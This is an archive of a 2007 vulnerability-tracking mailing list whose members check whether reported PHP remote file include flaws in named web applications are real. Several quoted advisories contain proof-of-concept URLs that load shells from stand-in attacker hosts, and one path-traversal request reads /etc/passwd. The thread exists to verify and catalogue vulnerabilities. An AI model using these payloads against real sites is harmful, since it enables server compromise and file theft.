From str0ke at milw0rm.com Thu Feb 1 09:52:47 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 1 Feb 2007 08:52:47 -0600 Subject: [VIM] False: drake_0.2.10 => (d_root) Remote File Include Exploit Message-ID: <814b9d50702010652r72c36eo6282dfd83bbdca5b@mail.gmail.com> Recieved this today which shouldn't work. > require 'version.php'; contains $d_root = str_replace('\\','/', dirname(__FILE__)).'/'; Looking over the other includes further down the line do not contain any kind of $_GET extracts. /str0ke Xmor$ DigitaL Hacking TeaM # drake_0.2.10 => (d_root) Remote File Include Exploit # Script.............. : drake CMS # Discovered by.... : the_Edit0r # Location .......... : Iran # Class.............. : Remote # Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8) # We ArE : Scorpiunix , KAMY4r , SilliCONIC , Zer0.C0d3r # D3vil_B0y_ir , Tornado , DarkAngel , S.W.A.T # download: http://www.kre8webdesign.com/media/download/linx-zip.zip In the documentation it contains Open up /new-pages/add.php and /new-pages/search.php and edit the second line down in each file to point to the absolute path of config.inc.php on your webserver.. include("/www/the/path/to/your/linx/admin/config.inc.php"); include($base_admin_path."templates/submit-rules.php"); config.inc.php contains: $base_admin_path = '/www/path/to/linx/admin/'; Seems this script isn't vulnerable after installing the app correctly. /str0ke -------- received email edited below. http://[target]/[path]//new-pages/add.php?base_admin_path=[SHELL] Example: //new-pages/add.php?base_admin_path=http://[target]/[path]/shell.x From str0ke at milw0rm.com Thu Feb 1 10:15:43 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 1 Feb 2007 09:15:43 -0600 Subject: [VIM] true but: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability Message-ID: <814b9d50702010715n103da86apd770d2d1bda45e03@mail.gmail.com> The program is vulnerable: $config[sipssys] is the first line of code in the file box.inc.php. But the documentation states. Unpack the sips archive file. Sips requires a special directory where it stores all kinds of data such as users, stories and php code. This directory can be anywhere, but if you can, you should place it outside of the public html area of the server, for security reasons. So its kind of a coin toss up. /str0ke http://sourceforge.net/projects/sips/ //sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x From str0ke at milw0rm.com Thu Feb 1 10:23:16 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 1 Feb 2007 09:23:16 -0600 Subject: [VIM] true: phpEventMan RFI Vuln. Message-ID: <814b9d50702010723u200e4537hafe633c5fcc86dd6@mail.gmail.com> first line of code in both files are common.function.php include_once($level."Shared/sharedfunctions.php"); text.ctrl.php include_once($level."UserMan/controller/common.function.php"); /str0ke ----------------------------------------------- phpEventMan v1.0.2 (level) Remote File Include Exploit ----------------------------------------------- Author: Cyber-Security cyber-security.org ----------------------------------------------- Code: include_once($level."UserMan/controller/common.function.php"); include_once($level."Shared/sharedfunctions.php"); ----------------------------------------------- POC: www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ? www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ? ----------------------------------------------- download: http://sourceforge.net/project/showfiles.php?group_id=169887 ----------------------------------------------- Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594 From str0ke at milw0rm.com Thu Feb 1 14:07:21 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 1 Feb 2007 13:07:21 -0600 Subject: [VIM] True: Somery 0.4.6 (skindir install.php) Remote file include Message-ID: <814b9d50702011107u2e9d6d15l6da47f7e0af3fd6d@mail.gmail.com> The install.php file is supposed to be removed after installation atleast its stated in the documentation, then again the product doesn't need the install.php file to be removed to run. install.php ------------------------------ include("config.php"); include("$skindir/header.php"); extract($_POST); extract($_GET); line 208: include("$skindir/footer.php"); ******************************************************************************* ConTact:-wWw.Asb-May.Net Greatz to:AsB-MaY TeAm & HaCk.eGy & To0oFa ScRiPt:-http://somery.danwa.net Discovered By:- ThE dE at Th <<{AsB-MaY DiScOvEr ExPlIoTs GrOuP}>> ******************************************************************************** install.php:- include("$skindir/footer.php"); ******************************************************************************** ExPlOiT: http://www.Site.com/Upload/install.php?skindir=[Shell] From str0ke at milw0rm.com Thu Feb 1 14:14:37 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 1 Feb 2007 13:14:37 -0600 Subject: [VIM] true: Epistemon 1.0 <= Remote File Include Vulnerability Message-ID: <814b9d50702011114r53e5c95asf2eeaac78565bad8@mail.gmail.com> First line of code in common.inc.php is include($inc_path.'config.php'); /str0ke -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Epistemon 1.0 <= Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_ at W.Cn -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= URL: http://sourcesup.cru.fr/frs/download.php/668/Epistemon_V1.tgz -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= V.CODE: In : /plateforme/code/inc/common.inc.php include($inc_path.'config.php'); include ($inc_path."i18n.inc.php"); include ($inc_path."const.inc.php") ; include ($inc_path."c_init.inc".$ext) ; include ($inc_path."c_chapitre.inc".$ext) ; include ($inc_path."c_color.inc".$ext) ; include ($inc_path."c_connexion.inc".$ext); include ($inc_path."c_file.inc".$ext) ; include ($inc_path."c_formation.inc".$ext); include ($inc_path."c_groupe.inc".$ext) ; include ($inc_path."c_header.inc".$ext) ; include ($inc_path."c_mail.inc".$ext) ; include ($inc_path."c_membre.inc".$ext) ; include ($inc_path."c_webmail.inc".$ext) ; include ($inc_path."c_module.inc".$ext) ; include ($inc_path."c_mysql.inc".$ext) ; include ($inc_path."c_phorum.inc".$ext) ; include ($inc_path."c_tuteur.inc".$ext) ; include ($inc_path."c_document.inc".$ext) ; include ($inc_path."html.inc".$ext) ; include ($inc_path."c_complement.inc".$ext); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: http://www.hedef.com/[path]/plateforme/code/inc/common.inc.php?inc_path=Evil.txt -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From str0ke at milw0rm.com Thu Feb 1 14:52:41 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 1 Feb 2007 13:52:41 -0600 Subject: [VIM] true: WebBuilder <= 2.0 Remote File Include Vulnerability Message-ID: <814b9d50702011152t1e437356gda8121b165bfd42b@mail.gmail.com> The first line of code contains. require_once($GLOBALS['core']['module_path'].'/module_common.php'); After looking at the www directory it contains an .htaccess file with the following. php_flag zlib.output_compression off php_flag short_open_tag off php_flag register_globals off php_flag asp_tags off php_flag magic_quotes_gpc off php_flag magic_quotes_runtime off I thought maybe the library directory wasn't supposed to be accessed by http requests since there isn't an .htaccess file for it. INSTALLATION notes: To install the WebBuilder simply point your browser at www/index.php and enter any requested information. This will setup your database and core configuration. This shows accessing the library directory shouldn't be an issue. /str0ke -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= WebBuilder <= Remote File Include Vulnerability * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_ at W.Cn * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= URL: * http://oss.backendmedia.com/snapshots/webbuilder2-2006-08-18.zip * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= V.CODE: In : /library/StageLoader.php * require_once($GLOBALS['core']['module_path'].'/module_common.php'); * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: * http://victim.com/[path]/library/StageLoader.php?GLOBALS[core][module_path]=Evil.txt? * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/ From coley at linus.mitre.org Thu Feb 1 14:57:27 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 1 Feb 2007 14:57:27 -0500 (EST) Subject: [VIM] true but: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability In-Reply-To: <814b9d50702010715n103da86apd770d2d1bda45e03@mail.gmail.com> References: <814b9d50702010715n103da86apd770d2d1bda45e03@mail.gmail.com> Message-ID: On Thu, 1 Feb 2007, str0ke wrote: > But the documentation states. > > Unpack the sips archive file. Sips requires a special directory where it > stores all kinds of data such as users, stories and php code. This directory > can be anywhere, but if you can, you should place it outside of the public > html area of the server, for security reasons. > > So its kind of a coin toss up. Probably worth noting in the CVE when we make it, but I think it's still reasonable to track these, since we know how frequently admins would skip this configuration step - or perhaps be forced into keeping the insecure configuration due to other factors. - Steve From str0ke at milw0rm.com Thu Feb 1 16:57:56 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 1 Feb 2007 15:57:56 -0600 Subject: [VIM] Fwd: php web portail [remote file include & local file include] In-Reply-To: <20070201185244.433.qmail@securityfocus.com> References: <20070201185244.433.qmail@securityfocus.com> Message-ID: <814b9d50702011357mdf1a71cw2672b14ee665838b@mail.gmail.com> The local include doesn't seem right. /index.php $site_path="./"; Remote does. /includes/includes.php define("PHPVERSION","php"); //definit le classpath selon la version de php if(PHPVERSION =="php5"){ define("CLASS_PATH",$site_path."includes/classes/php5/"); }else{ define("CLASS_PATH",$site_path."includes/classes/php4/"); define("PHPVERSION","php"); } include_once($site_path."includes/function/function.php"); /str0ke ---------- Forwarded message ---------- From: saps.audit at gmail.com Date: 1 Feb 2007 18:52:44 -0000 Subject: php web portail [remote file include & local file include] To: bugtraq at securityfocus.com php web portail [remote file include & local file include] download site: https://sourceforge.net/project/showfiles.php?group_id=178400 product:php web portail bug: remote file include & local file include risk : high local file include : /index.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd remote file include : /includes/includes.php?site_path=http://site.com/shell.txt?%00 laurent gaffi? http://s-a-p.ca/ contact: saps.audit at gmail.com From str0ke at milw0rm.com Fri Feb 2 09:36:47 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 2 Feb 2007 08:36:47 -0600 Subject: [VIM] false: calendar = Remote File Include Vulnerability Message-ID: <814b9d50702020636m289af696x1c2aa269736d741e@mail.gmail.com> First line of code is below. $calpath = "/home/swentel/projects/calendar/"; Another false. /str0ke -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Calendar <= Remote File Include Vulnerability URL: http://fresh.t-systems-sfr.com/unix/src/privat2/calendar.tar.gz -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= V.CODE: In : calendar/cal_config.inc.php <<<<=====>>>> Line : 48 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: http://www.XXX.com/[Calendar_path]/cal_config.inc.php?calpat=hhttp://sheLL? From str0ke at milw0rm.com Fri Feb 2 09:51:42 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 2 Feb 2007 08:51:42 -0600 Subject: [VIM] false: phpoll-1.1 <= Remote File Include Vulnerability Message-ID: <814b9d50702020651o1c12d49dvec6e997087621a1f@mail.gmail.com> Isn't vulnerable, the variable isn't correctly used on line 290 polldir is actually pollDir and is inside of a function. Installed for testing with it not being vulnerable. /str0ke -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- phpoll-1.1 <= Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- URL: http://fresh.t-systems-sfr.com/unix/src/privat2/phpoll-1.1.tgz -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= V.CODE: In : /phpoll.php <<<<=====>>>> Line :290 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: http://www.victimes.com/[phpoll_path]/phpoll.php?polldir=http://sheLL? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From str0ke at milw0rm.com Fri Feb 2 10:13:33 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 2 Feb 2007 09:13:33 -0600 Subject: [VIM] true: DreamStats V 4.2=(index.php)=>Remote File Include Message-ID: <814b9d50702020713m4be8dfcag49cbc80317796200@mail.gmail.com> The section that matters is lines 17-22. // +---------------------------------------------+ // | Copyright (c) 2004 ? 2005 mnProjects | // | http://www.mnprojects.com | // | DreamStats System by Miguel Nunes | // +---------------------------------------------+ error_reporting(E_ALL ^ E_NOTICE); // D r e a m S t a t s // // For Call of Duty 2 version 1.0 define('in_main', true); define('in_dreamstats', true); if (!isset($_GET['server'])) { ################################### Includes ################################### @include($rootpath . 'includes/ip_vers.php'); @include($rootpath . 'includes/core.php'); Thats about as vulnerable as we get. This is for version 4.2 (4.1 and below were not downloadable), 5.0 isn't vulnerable. /str0ke ConTact Me:-wWw.Asb-May.Net ScRiPt:-http://callofduty.filefront.com/file/DreamStats_System;54520 Discovered By:- ThE dE at Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>> ****************************************************************************** index.php:- if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;} ******************************************************************************** ExPlOiT:-http://www.Site.com/PaTh/upload/index.php?rootpath=[Shell] ******************************************************************************** _________________________________________________________________ FREE pop-up blocking with the new MSN Toolbar - get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/ From str0ke at milw0rm.com Fri Feb 2 10:44:12 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 2 Feb 2007 09:44:12 -0600 Subject: [VIM] true: Flipper Poll v1.1.0 (poll.php) RFI Vuln. Message-ID: <814b9d50702020744m562153e0x29306c2ae32fb200@mail.gmail.com> First line of code. include_once($root_path . 'config.php'); /str0ke Flipper Poll v1.1.0 (poll.php) remote file include vuln --------------------------------------------------------------------------------- Found: Cyber-Security cyber-security.org --------------------------------------------------------------------------------- Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828 --------------------------------------------------------------------------------- Vuln Code: include_once($root_path . 'config.php'); --------------------------------------------------------------------------------- Exploit: /poll.php?root_path=evilscripts? --------------------------------------------------------------------------------- Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596 --------------------------------------------------------------------------------- From str0ke at milw0rm.com Fri Feb 2 10:53:29 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 2 Feb 2007 09:53:29 -0600 Subject: [VIM] false: MySpeach v3.0.6 Remote File Inclusion Message-ID: <814b9d50702020753v778b9425teae27999ec4c3410@mail.gmail.com> first lines of code. if(!@file_exists($my_ms['root'].'/admin/config.php')){ exit('

MySpeach n est pas encore install?.

'); } include_once("admin/config.php"); $my_ms['root']=$my_ms["absolu_root"].$my_ms["repertoire"]; include($my_ms['root'].'/chat.php'); admin/config.php initializes $my_ms["absolu_root"]. if(!isset($_GET['chm'])){ $_GET['chm']=''; } if(!isset($_GET['rqst'])){ $_GET['rqst']=''; } if(!isset($_GET['count'])){ $_GET['count'] = ''; } if(!isset($_GET['titre'])){ $_GET['titre'] = ''; } // :: fin des def //::: Location de myspeach $my_ms['root']='../myspeach'; if(isset($_GET['my_ms[root]'])) { exit('et la marmotte elle fais quoi?'); } // on v?rifie si $my_ms['root'] existe bien, qu'il ne contient pas un code qui pourrai include la page&nbs p;d'un autre site et que le fichier existe bien sur ce serveur. if($my_ms["root"] != '' AND file_exists($my_ms["root"].'/error.php') AND !eregi(':/',$my_ms["root"])) /str0ke * Portal Name = MySpeach v3.0.6 * Class = Remote File Inclusion * Risk = High * Download = ftp://ftp1.comscripts.com/PHP/1386_myspeach-306.zip ********************************************************************************** - Exploit: http://www.site.com/[script path]/chat.php?my_ms[root]=[evil host] http://www.site.com/[script path]/chat_exemple.php?my_ms[root]=[evil host] http://www.site.com/[script path]/chat_rqst.php?my_ms[root]=[evil host] http://www.site.com/[script path]/jscript.php?my_ms[root]=[evil host] *********************************************************************************** From str0ke at milw0rm.com Fri Feb 2 12:04:01 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 2 Feb 2007 11:04:01 -0600 Subject: [VIM] FALSE: PHP LIGHTNING PORTAL (PLP) v.2.0 Remote File Inclusion Message-ID: <814b9d50702020904q52166d3di40b0724d1eff48ef@mail.gmail.com> define('SITE_PATH','/var/www/htdocs/'); //with trailing "/" require SITE_PATH.'inc/lib.inc.php'; Enough said. /str0ke * Portal Name = PHP LIGHTNING PORTAL (PLP) v.2.0 * Class = Remote File Inclusion * Risk = High * Download = http://www.alarit.com/downloads/products/plp_2_0_demo.zip ********************************************************************************** - Exploit: http://www.site.com/[script path]/inc/application.php?SITE_PATH=[evil host] *********************************************************************************** From str0ke at milw0rm.com Fri Feb 2 12:16:49 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 2 Feb 2007 11:16:49 -0600 Subject: [VIM] Fwd: ACGV Comment 1.0 Message-ID: <814b9d50702020916l4d3ee875v632c73e42a43d39@mail.gmail.com> function.inc.php only contains functions that are never called. /str0ke File Corrupted: function.inc.php require($GLOBALS["pathcom"]."config/comment.inc.php"); require($GLOBALS["pathcom"]."config/langue/"."$langue".".php"); ******************************************************************************** Exploit: http://www.Site.com/config/function.inc.php?GLOBALS[pathcom]=Evil Script ******************************************************************************** From f.riphagen at nsec.nl Fri Feb 2 12:25:34 2007 From: f.riphagen at nsec.nl (Ferdy Riphagen) Date: Fri, 02 Feb 2007 18:25:34 +0100 Subject: [VIM] true: Flipper Poll v1.1.0 (poll.php) RFI Vuln. In-Reply-To: <814b9d50702020744m562153e0x29306c2ae32fb200@mail.gmail.com> References: <814b9d50702020744m562153e0x29306c2ae32fb200@mail.gmail.com> Message-ID: <45C3740E.60300@nsec.nl> str0ke wrote: > > Flipper Poll v1.1.0 (poll.php) remote file include vuln > --------------------------------------------------------------------------------- > > > Found: Cyber-Security > cyber-security.org > - I've noticed this one multiple times, now and mid 2006, all from different authors (I assume) http://archives.neohapsis.com/archives/bugtraq/2006-07/0187.html (XORON) http://archives.neohapsis.com/archives/bugtraq/2006-06/0275.html (SpC-X) --Ferdy-- From str0ke at milw0rm.com Fri Feb 2 12:28:12 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 2 Feb 2007 11:28:12 -0600 Subject: [VIM] true: phpBB ezBoard converter 0.2 (ezconvert_dir) Remote File Include Exploit Message-ID: <814b9d50702020928s1fe8cfd2nc733936cbfa7bf6b@mail.gmail.com> link: http://www.milw0rm.com/exploits/3258 config.php?ezconvert_dir= First line of code: include ($ezconvert_dir . 'ezboard-parse.' . $phpEx); /str0ke From str0ke at milw0rm.com Fri Feb 2 12:34:36 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 2 Feb 2007 11:34:36 -0600 Subject: [VIM] phpBB++ Build 100 (phpbb_root_path) Remote File Include Exploit Message-ID: <814b9d50702020934k40fd27abpc4c7a6dc3f3edc03@mail.gmail.com> http://www.milw0rm.com/exploits/3259 First line of code. include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx ); /str0ke From heinbockel at mitre.org Fri Feb 2 15:43:32 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Fri, 2 Feb 2007 15:43:32 -0500 Subject: [VIM] Local File Inclusion inconclusive in PwP (was Fwd: php web portail [remote file include & local fileinclude]) In-Reply-To: <814b9d50702011357mdf1a71cw2672b14ee665838b@mail.gmail.com> References: <20070201185244.433.qmail@securityfocus.com> <814b9d50702011357mdf1a71cw2672b14ee665838b@mail.gmail.com> Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC018CF1C3@IMCSRV5.MITRE.ORG> >-----Original Message----- >From: vim-bounces at attrition.org >[mailto:vim-bounces at attrition.org] On Behalf Of str0ke >Sent: Donnerstag, 1. Februar 2007 16:58 >To: Vulnerability Information Managers >Subject: [VIM] Fwd: php web portail [remote file include & >local fileinclude] > >The local include doesn't seem right. > >/index.php > >$site_path="./"; > Right, it doesn't seem right, because you're looking at the wrong parameter ;-) The original PoC was for the page parameter. /index.php?page=../../../../../../../../../../../../../../../../../../. ./etc/passwd After doing some further digging, it is still unclear as to whether the issue is valid. index.php includes includes/includes.php, which includes includes/function/function.php, which is used by includes.php to import every file under includes/classes/php4/. This ends up including roughly 50 other PHP files... Looking for use of the $page variable, shows that system/compteur/Compteur.class.php and system/redirection.class.php may be vulnerable. However I did not spend the time to dig through call stacks to see if the functions are ever called starting from index.php. In the end, CVE calls this inconclusive... Too many vulnerabilities, too little time. BTW, str0ke was right with the RFI; that one is definitely possible. William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From str0ke at milw0rm.com Fri Feb 2 16:15:55 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 2 Feb 2007 15:15:55 -0600 Subject: [VIM] Local File Inclusion inconclusive in PwP (was Fwd: php web portail [remote file include & local fileinclude]) In-Reply-To: <224FBC6B814DBD4E9B9E293BE33A10DC018CF1C3@IMCSRV5.MITRE.ORG> References: <20070201185244.433.qmail@securityfocus.com> <814b9d50702011357mdf1a71cw2672b14ee665838b@mail.gmail.com> <224FBC6B814DBD4E9B9E293BE33A10DC018CF1C3@IMCSRV5.MITRE.ORG> Message-ID: <814b9d50702021315j76a522e0j55eb8bac27c0b29a@mail.gmail.com> On 2/2/07, Heinbockel, Bill wrote: > Right, it doesn't seem right, because you're looking at the wrong > parameter ;-) Go figure, I blame lack of sleep :) /str0ke From coley at mitre.org Sat Feb 3 16:42:52 2007 From: coley at mitre.org (Steven M. Christey) Date: Sat, 3 Feb 2007 16:42:52 -0500 (EST) Subject: [VIM] FLIP SQL injection clarification Message-ID: <200702032142.l13LgqbI019555@faron.mitre.org> Ref: CONFIRM:http://sourceforge.net/project/shownotes.php?release_id=481131&group_id=98260 Rough translation is "SQL Injection continues to decrease, through escape_sqlData(), implode_sql(), implode_sqlIn() which all implode()s in Queries replaces and all data escape." Some sources are reporting these as the vulnerable functions, but certainly the escape_sqlData name suggests some kind of quoting, so an alternate intepretation is that the vendor is USING these functions as protection schemes to protect against SQL injection in various other functions. A big diff between RC2 and RC3 highlights this... diff -r flip-rc2/web/catering.php flip-rc3/web/catering.php < $bids = "b.`id`='".implode("' OR b.`id`='", $post["ids"])."'"; < $ids = "`id`='".implode("' OR `id`='", $post["ids"])."'"; --- > $bids = "b.`id` IN (".implode_sqlIn($post["ids"]).")"; > $ids = "`id` IN (".implode_sqlIn($post["ids"]).")"; diff -r flip-rc2/web/core/core.mysql.php flip-rc3/web/core/core.mysql.php < if(is_null($val)) $Values[$col] = "`$col` = NULL"; < else $Values[$col] = "`$col` = '".addslashes($val)."'"; --- > $Values[$col] = "`$col` = ".escape_sqlData($val); ... AND MANY OTHER FILES ... who knows which vectors are actually vulnerable ... And the finale: diff -r flip-rc2/web/core/core.utils.php flip-rc3/web/core/core.utils.php > /** > * Setzt den String escaped in Hochkommata, falls er nicht numerisch ist > * > * @since 1345 - 24.01.2007 > * @param String $sqlvalue Dieser Text wird (sql-)gesichert > * @return String > */ > function escape_sqlData($sqlvalue) { ... > function implode_sql($glue, $array) { ... > function implode_sqlIn($array) { So, obviously these functions couldn't be vulnerable if they didn't exist in RC2. - Steve From coley at linus.mitre.org Sat Feb 3 17:12:21 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Sat, 3 Feb 2007 17:12:21 -0500 (EST) Subject: [VIM] true but: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability In-Reply-To: <814b9d50702010715n103da86apd770d2d1bda45e03@mail.gmail.com> References: <814b9d50702010715n103da86apd770d2d1bda45e03@mail.gmail.com> Message-ID: On Thu, 1 Feb 2007, str0ke wrote: > The program is vulnerable: $config[sipssys] is the first line of code > in the file box.inc.php. Also, this is a rediscovery - CVE-2006-4733, posted to Bugtraq by ThE__LeO in Sep 2006, although that one only claimed 0.2.2. - Steve From coley at linus.mitre.org Sat Feb 3 17:30:29 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Sat, 3 Feb 2007 17:30:29 -0500 (EST) Subject: [VIM] PHP interpreter problems and blaming the victim - GLOBALS etc. In-Reply-To: <814b9d50702011152t1e437356gda8121b165bfd42b@mail.gmail.com> References: <814b9d50702011152t1e437356gda8121b165bfd42b@mail.gmail.com> Message-ID: On Thu, 1 Feb 2007, str0ke wrote: > The first line of code contains. > > require_once($GLOBALS['core']['module_path'].'/module_common.php'); OK, I'm starting to get a little worried about this trend of hacking GLOBALS, SERVER, SESSION, FILES, etc. from a VDB perspective. Really, what chance does any application have against a GLOBALS overwrite when it's a PHP bug itself? If there's no chance - then should we be flagging these apps in VDB's? According to Stefan Esser - "Unfortunately the register_globals mode of PHP was not protected at all against overwritting GLOBALS from the outside until PHP 4.3.11 and this protection had a hole before PHP 4.4.1, which means when register_globals is turned on in PHP versions before 4.4.1 it is possible to exploit code sequences like the one found above... PHP4 >= 4.4.1 adds checks to extract() and import_request_variables() to protect them against overwriting the $GLOBALS variable. This however does not protect against applications that use their own routines to globalize ... [such as $$varname = $value]" For PHP 5, he says "In PHP5 the $GLOBALS array is implemented as a real superglobal, that is registered before anything else is added to the main symbol table. This means, when it is overwritten in PHP5 it has a different impact on the application, than in PHP4. Because it is registered before the request variables are parsed and because there was no (or better no working) protection in PHP <= 5.0.5 it was possible to overwrite $GLOBALS from the outside when register_globals is turned on, or extract() or import_request_variables() were used in an unsafe way. The major difference between the impact on PHP4 and PHP5 is, that due to the real superglobals nature of $GLOBALS the overwrite will not only be visible in the scope where it happened, but in all scopes." http://www.hardened-php.net/globals-problem Now, from a sploit standpoint, I can see how this kind of issue is still worth tracking, because no doubt there are many active environments out there using vulnerable PHP versions. But flagging these apps for GLOBALS problems (and, presumably, other superglobals overwrites) seems incorrect to me. Operationally it's important, since if you're a consumer and your app uses GLOBALS, you want to know; but CVE and some other vdb's won't distinguish between every product that uses a vulnerable zlib, for example. I don't recall there being other major programming language bugs past that introduced vulnerabilities that could not be defended against. The Perl format string issue only existed if your program had user-injected format strings (which I still think is important even though it's not for code execution). I suspect that some XSS also stems from the PHP "XSS in error message" problem, and then you've also got the unset() issue. This seems to be making things very messy. Thoughts? Anybody know the status of other superglobals like FILE and SESSION? - Steve From coley at mitre.org Wed Feb 7 00:44:29 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 7 Feb 2007 00:44:29 -0500 (EST) Subject: [VIM] true: Categories hierarchy class_template.php RFI Message-ID: <200702070544.l175iT4Y024993@faron.mitre.org> Leave it to str0ke to boil down subject lines to true/false. Plagiarism is the sincerest form of flattery, dude. *ahem* anyway... Researcher: xoron Ref: http://www.milw0rm.com/exploits/3270 In the URL download provided, the first line in class_template.php is: include($phpbb_root_path . 'includes/template.' . $phpEx); - Steve From coley at mitre.org Wed Feb 7 01:02:00 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 7 Feb 2007 01:02:00 -0500 (EST) Subject: [VIM] true w/caveat: GeekLog glConf[path_libraries] RFI Message-ID: <200702070602.l17620IA025275@faron.mitre.org> Researcher: GolD_M(Mahmnood_ali) 